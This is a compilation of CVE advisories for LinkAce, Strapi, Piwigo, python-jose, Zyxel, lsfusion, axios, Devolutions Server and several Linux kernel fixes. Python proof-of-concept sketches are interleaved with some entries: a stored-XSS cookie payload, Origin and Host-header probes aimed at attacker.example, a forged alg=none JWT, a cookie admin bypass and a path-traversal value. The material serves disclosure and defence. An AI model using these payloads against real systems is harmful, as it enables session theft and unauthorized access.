| LinkAce is a self-hosted archive to collect website links. In versions 2.3.1 and below, the social media sharing functionality contains a Stored Cross-Site Scripting (XSS) vulnerability that allows any authenticated user to inject arbitrary JavaScript by creating a link with malicious HTML in the title field. When a user views the link details page and the shareable links are rendered, the malicious JavaScript executes in their browser. This vulnerability affects multiple sharing services and can be exploited to steal session cookies, perform actions on behalf of users, or deliver malware. This issue is fixed in version 2.4.0. |
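A minimal sketch of the attack shape in Python, assuming the attacker holds an ordinary user's API token and that links can be created via LinkAce's REST API; the /api/v1/links path and field names are assumptions, and any authenticated link-creation channel would work the same way:

```python
# PoC sketch only: endpoint path, field names, and token handling are
# assumptions about a LinkAce instance, not confirmed details.
import requests

BASE = "https://linkace.example.com"            # hypothetical instance
TOKEN = "api-token-of-any-authenticated-user"   # placeholder

# HTML smuggled in via the title field; it fires when the link details
# page renders the social sharing snippets without escaping the title.
payload_title = '<img src=x onerror="alert(document.cookie)">'

resp = requests.post(
    f"{BASE}/api/v1/links",
    headers={"Authorization": f"Bearer {TOKEN}", "Accept": "application/json"},
    json={"url": "https://example.org", "title": payload_title},
)
print(resp.status_code)
```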
| In the Linux kernel, the following vulnerability has been resolved:
iio: adc: ad7173: fix channels index for syscalib_mode
Fix the index used to look up the channel when accessing the
syscalib_mode attribute. The address field is a 0-based index (same
as scan_index) that is used to access the channel in the
ad7173_channels array throughout the driver. The channels field, on
the other hand, may not match the address field depending on the
channel configuration specified in the device tree and could result
in an out-of-bounds access. |
| Strapi is an open source headless content management system. Strapi versions prior to 5.20.0 contain a CORS misconfiguration vulnerability in default installations. By default, Strapi reflects the value of the Origin header back in the Access-Control-Allow-Origin response header without proper validation or whitelisting. This allows an attacker-controlled site to send credentialed requests to the Strapi backend. An attacker can exploit this by hosting a malicious site on a different origin (e.g., different port) and sending requests with credentials to the Strapi API. The vulnerability is fixed in version 5.20.0. No known workarounds exist. |
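A quick way to probe for the reflected-Origin behavior, as a hedged Python sketch; the host, port, and endpoint below are placeholders for a local Strapi instance:

```python
# Send an arbitrary Origin and check whether it is echoed back verbatim.
import requests

resp = requests.get(
    "http://localhost:1337/api/users/me",          # hypothetical endpoint
    headers={"Origin": "https://attacker.example"},
)
print(resp.headers.get("Access-Control-Allow-Origin"))
print(resp.headers.get("Access-Control-Allow-Credentials"))
# A vulnerable install echoes "https://attacker.example", allowing a page
# on that origin to issue credentialed cross-origin requests and read the
# responses.
```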
| Piwigo is a full-featured open source photo gallery application for the web. In Piwigo 15.6.0, the password reset function sends a password-reset URL when an existing username or email address is entered. However, the hostname used to construct this URL is taken from the HTTP request's Host header and is not validated at all. An attacker can therefore send a password-reset URL with a modified hostname to any existing user whose username or email the attacker knows or guesses. This issue has been patched in version 15.7.0. |
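A hedged sketch of the Host-header manipulation; the reset path and form field name are assumptions about Piwigo's reset form, not confirmed details:

```python
# Trigger a password reset while spoofing the Host header.
import requests

resp = requests.post(
    "https://gallery.example.com/password.php",        # assumed reset endpoint
    data={"username_or_email": "victim@example.com"},  # hypothetical field name
    headers={"Host": "attacker.example"},
)
# On a vulnerable 15.6.0 install, the victim's reset email contains a URL
# built from the attacker-controlled Host header, so the reset key is
# disclosed to attacker.example if the victim clicks the link.
```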
| In the Linux kernel, the following vulnerability has been resolved:
crypto: x86/aegis - Add missing error checks
The skcipher_walk functions can allocate memory and can fail, so
checking for errors is necessary. |
| In the Linux kernel, the following vulnerability has been resolved:
dm: dm-crypt: Do not partially accept write BIOs with zoned targets
Read and write operations issued to a dm-crypt target may be split
according to the dm-crypt internal limits defined by the max_read_size
and max_write_size module parameters (default is 128 KB). The intent is
to improve processing time of large BIOs by splitting them into smaller
operations that can be parallelized on different CPUs.
For zoned dm-crypt targets, this BIO splitting is still done but without
the parallel execution to ensure that the issuing order of write
operations to the underlying devices remains sequential. However, the
splitting itself causes other problems:
1) Since dm-crypt relies on the block layer zone write plugging to
handle zone append emulation using regular write operations, the
remainder of a split write BIO will always be plugged into the target
zone write plug. Once the ongoing write BIO finishes, this
remainder BIO is unplugged and issued from the zone write plug work.
If this remainder BIO itself needs to be split, the remainder will be
re-issued and plugged again, but that causes a call to
blk_queue_enter(), which may block if a queue freeze operation was
initiated. This results in a deadlock as DM submission still holds
BIOs that the queue freeze side is waiting for.
2) dm-crypt relies on the emulation done by the block layer using
regular write operations for processing zone append operations. This
still requires properly returning the written sector as the BIO
sector of the original BIO. However, this can be done correctly if
and only if there is a single clone BIO used for processing the
original zone append operation issued by the user. If the size of a
zone append operation is larger than the dm-crypt max_write_size, then
the original BIO will be split and processed as a chain of regular
write operations. Such chaining results in an incorrect written sector
being returned to the zone append issuer using the original BIO
sector. This in turn results in file system data corruption with
xfs or btrfs.
Fix this by modifying get_max_request_size() to always return the size
of the BIO to avoid it being split with dm_accept_partial_bio() in
crypt_map(). get_max_request_size() is renamed to
get_max_request_sectors() to clarify the unit of the value returned
and its interface is changed to take a struct dm_target pointer and a
pointer to the struct bio being processed. In addition to this change,
to ensure that crypt_alloc_buffer() works correctly, set the dm-crypt
device max_hw_sectors limit to be at most
BIO_MAX_VECS << PAGE_SECTORS_SHIFT (1 MB with a 4KB page architecture).
This forces DM core to split write BIOs before passing them to
crypt_map(), thus guaranteeing that dm-crypt can always accept an
entire write BIO without needing to split it.
This change does not have any effect on the read path of dm-crypt. Read
operations can still be split and the BIO fragments processed in
parallel. There is also no impact on the performance of the write path
given that all zone write BIOs were already processed inline instead of
in parallel.
This change also does not affect in any way regular dm-crypt block
devices. |
| In the Linux kernel, the following vulnerability has been resolved:
dm: Always split write BIOs to zoned device limits
Any zoned DM target that requires zone append emulation will use the
block layer zone write plugging. In such case, DM target drivers must
not split BIOs using dm_accept_partial_bio() as doing so can potentially
lead to deadlocks with queue freeze operations. Regular write operations
used to emulate zone append operations also cannot be split by the
target driver as that would result in an invalid written sector value
being returned using the BIO sector.
In order for zoned DM target drivers to avoid such incorrect BIO
splitting, we must ensure that large BIOs are split before being passed
to the map() function of the target, thus guaranteeing that the
limits for the mapped device are not exceeded.
dm-crypt and dm-flakey are the only target drivers supporting zoned
devices and using dm_accept_partial_bio().
In the case of dm-crypt, this function is used to split BIOs to the
internal max_write_size limit (which will be suppressed in a different
patch). However, crypt_alloc_buffer() uses a bioset allowing only
up to BIO_MAX_VECS (256) vectors in a BIO. The dm-crypt device
max_segments limit, which is not set and so defaults to BLK_MAX_SEGMENTS
(128), must thus be respected and write BIOs split accordingly.
In the case of dm-flakey, since zone append emulation is not required,
the block layer zone write plugging is not used and no splitting of BIOs
is required.
Modify the function dm_zone_bio_needs_split() to use the block layer
helper function bio_needs_zone_write_plugging() to force a call to
bio_split_to_limits() in dm_split_and_process_bio(). This allows DM
target drivers to avoid using dm_accept_partial_bio() for write
operations on zoned DM devices. |
| Improper access control in the secure message component in Devolutions Server allows an authenticated user to steal unauthorized entries via the secure message entry attachment feature.
This issue affects the following versions:
* Devolutions Server 2025.2.2.0 through 2025.2.4.0
* Devolutions Server 2025.1.11.0 and earlier |
| Use of weak credentials in the emergency authentication component in Devolutions Server allows an unauthenticated attacker to bypass authentication by brute-forcing the short emergency codes generated by the server within a feasible timeframe.
This issue affects the following versions:
* Devolutions Server 2025.2.2.0 through 2025.2.3.0
* Devolutions Server 2025.1.11.0 and earlier |
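Why short codes matter here, as back-of-the-envelope arithmetic under loudly hypothetical numbers (the advisory states neither the code length nor any rate limit):

```python
# Purely illustrative feasibility estimate; both figures are assumptions.
keyspace = 10 ** 6                     # assume a 6-digit numeric code
rate = 100                             # assume 100 guesses per second
worst_case_hours = keyspace / rate / 3600
print(f"~{worst_case_hours:.1f} h to exhaust the keyspace")   # ~2.8 h
```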
| python-jose through 3.3.0 allows JWT tokens with 'alg=none' to be decoded and accepted without any cryptographic signature verification. A malicious actor can craft a forged token with arbitrary claims (e.g., is_admin=true) and bypass authentication checks, leading to privilege escalation or unauthorized access in applications that rely on python-jose for token validation. This issue is exploitable unless developers explicitly reject 'alg=none' tokens, which is not enforced by the library. NOTE: all parties agree that the issue is not relevant because it only occurs in a "verify_signature": False situation. |
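A minimal sketch of the forgery and of the unsafe decode pattern the NOTE describes; the claims, key, and call shape are illustrative only:

```python
# Craft an unsigned 'alg=none' token by hand, then decode it with
# python-jose (<= 3.3.0) with signature verification disabled -- the
# misuse pattern that makes the forged claims come back as trusted data.
import base64
import json

from jose import jwt

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
claims = b64url(json.dumps({"sub": "alice", "is_admin": True}).encode())
forged = f"{header}.{claims}."          # empty signature segment

# Dangerous: returns the claims without any cryptographic check.
print(jwt.decode(forged, key="", options={"verify_signature": False}))

# Safe pattern: verify against a real key and pin the expected algorithm,
# e.g. jwt.decode(token, public_key, algorithms=["RS256"]).
```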
| Improper access control in user group management in Devolutions Server 2025.1.7.0 and earlier allows a non-administrative user with both "User Management" and "User Group Management" permissions to perform privilege escalation by adding users to groups with administrative privileges. |
| Improper authorization in the temporary access workflow of Devolutions Server 2025.2.12.0 and earlier allows an authenticated basic user to self-approve or approve the temporary access requests of other users and gain unauthorized access to vaults and entries via crafted API requests. |
| On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access. |
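A minimal illustration of the reported bypass; the LAN address is a placeholder, while the cookie name and value come from the advisory:

```python
# Request an admin page while presenting the trusted client-side cookie.
import requests

resp = requests.get(
    "http://192.168.1.1/",      # typical default LAN address (placeholder)
    cookies={"login": "1"},     # per the advisory: login cookie set to 1
)
print(resp.status_code, len(resp.text))
```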
| In the Linux kernel, the following vulnerability has been resolved:
wifi: ath10k: shutdown driver when hardware is unreliable
In rare cases, ath10k may lose its connection with the PCIe bus for
unknown reasons, which can further lead to system crashes during
resume due to a watchdog timeout:
ath10k_pci 0000:01:00.0: wmi command 20486 timeout, restarting hardware
ath10k_pci 0000:01:00.0: already restarting
ath10k_pci 0000:01:00.0: failed to stop WMI vdev 0: -11
ath10k_pci 0000:01:00.0: failed to stop vdev 0: -11
ieee80211 phy0: PM: **** DPM device timeout ****
Call Trace:
panic+0x125/0x315
dpm_watchdog_set+0x54/0x54
dpm_watchdog_handler+0x57/0x57
call_timer_fn+0x31/0x13c
At this point, all WMI commands will time out and attempt to restart the
device. So set a threshold for consecutive restart failures. If the
threshold is exceeded, consider the hardware unreliable and skip all
ath10k operations to avoid a system crash.
fail_cont_count and pending_recovery are atomic variables, and
do not involve complex conditional logic. Therefore, even if recovery
check and reconfig complete are executed concurrently, the recovery
mechanism will not be broken.
Tested-on: QCA6174 hw3.2 PCI WLAN.RM.4.4.1-00288-QCARMSWPZ-1 |
| In the Linux kernel, the following vulnerability has been resolved:
drm/msm: Add error handling for krealloc in metadata setup
Function msm_ioctl_gem_info_set_metadata() now checks for krealloc
failure and returns -ENOMEM, avoiding potential NULL pointer dereference.
Explicitly avoids __GFP_NOFAIL due to deadlock risks and allocation constraints.
Patchwork: https://patchwork.freedesktop.org/patch/661235/ |
| A vulnerability was identified in the lsfusion platform up to version 6.1. It affects the function UploadFileRequestHandler in the file platform/web-client/src/main/java/lsfusion/http/controller/file/UploadFileRequestHandler.java. Manipulation of the argument sid can lead to path traversal. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. |
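A hedged probe sketch; only the handler class and the sid parameter come from the advisory, while the servlet path below is a hypothetical mapping:

```python
# Path traversal probe: a sid containing ../ sequences may escape the
# intended upload directory on vulnerable versions.
import requests

resp = requests.post(
    "https://lsfusion.example.com/uploadFile",   # hypothetical path mapping
    params={"sid": "../../../../tmp/poc"},       # traversal via sid
    data=b"poc-content",
)
print(resp.status_code, resp.text[:200])
```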
| In the Linux kernel, the following vulnerability has been resolved:
s390/ism: fix concurrency management in ism_cmd()
The s390x ISM device data sheet clearly states that only one
request-response sequence is allowable per ISM function at any point in
time. Unfortunately as of today the s390/ism driver in Linux does not
honor that requirement. This patch aims to rectify that.
This problem was discovered based on Aliaksei's bug report which states
that for certain workloads the ISM functions end up entering error state
(with PEC 2 as seen from the logs) after a while and as a consequence
connections handled by the respective function break, and for future
connection requests the ISM device is not considered -- given it is in a
dysfunctional state. During further debugging PEC 3A was observed as
well.
A kernel message like
[ 1211.244319] zpci: 061a:00:00.0: Event 0x2 reports an error for PCI function 0x61a
is a reliable indicator of the stated function entering error state
with PEC 2. Let me also point out that a kernel message like
[ 1211.244325] zpci: 061a:00:00.0: The ism driver bound to the device does not support error recovery
is a reliable indicator that the ISM function won't be auto-recovered
because the ISM driver currently lacks support for it.
On a technical level, without this synchronization, commands (inputs to
the FW) may be partially or fully overwritten (corrupted) by another CPU
trying to issue commands on the same function. There is hard evidence that
this can lead to DMB token values being used as DMB IOVAs, leading to
PEC 2 PCI events indicating invalid DMA. But this is only one of the
failure modes imaginable. In theory it is even possible to completely lose
one command, execute another one twice, and then interpret the outputs as
if the intended command had been executed rather than the other one.
Frankly, I don't feel confident about providing an exhaustive list of
possible consequences. |
| A vulnerability was found in the lsfusion platform up to version 6.1. It affects the function DownloadFileRequestHandler in the file web-client/src/main/java/lsfusion/http/controller/file/DownloadFileRequestHandler.java. Manipulation of the argument Version results in path traversal. The attack can be executed remotely. The exploit has been made public and could be used. |
| In the Linux kernel, the following vulnerability has been resolved:
mm: swap: fix potential buffer overflow in setup_clusters()
In setup_swap_map(), we only ensure badpages are in range (0, last_page].
As maxpages might be < last_page, setup_clusters() will encounter a buffer
overflow when a badpage is >= maxpages.
Only call inc_cluster_info_page() for badpages that are < maxpages to fix
the issue. |
| axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2. |
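The mechanism mirrors standard URL resolution, where an absolute URL supplied in the "relative" position replaces the configured base entirely; a minimal Python illustration of the same pitfall (Python's urljoin, not axios itself):

```python
# An absolute URL wins over the base, exactly the trap described above:
# attacker-influenced input can redirect a request away from baseURL.
from urllib.parse import urljoin

BASE = "https://internal-api.example.com/v1/"

print(urljoin(BASE, "users/42"))
# -> https://internal-api.example.com/v1/users/42

print(urljoin(BASE, "https://attacker.example/steal"))
# -> https://attacker.example/steal   (the base is ignored entirely)
```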